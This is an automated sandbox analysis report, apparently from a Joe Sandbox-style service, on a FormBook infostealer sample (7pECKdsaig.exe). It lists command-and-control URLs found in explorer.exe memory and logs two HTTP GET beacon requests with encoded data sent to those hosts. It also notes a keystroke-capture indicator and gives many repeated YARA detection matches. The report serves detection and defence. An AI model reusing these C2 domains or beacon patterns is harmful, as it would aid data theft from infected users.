Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.infoReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africaReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online/ar73/r
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.onlineReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.ukReferer:
Source: unknown DNS traffic detected: queries for: www.mogi.africa
Source: C:\Windows\explorer.exe Code function: 1_2_100D8F82 getaddrinfo,setsockopt,recv, 1_2_100D8F82
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1Host: www.kellnovaglobalfood.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1Host: www.controlplus.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: 7pECKdsaig.exe, 00000000.00000002.289211291.000000000145A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: 7pECKdsaig.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
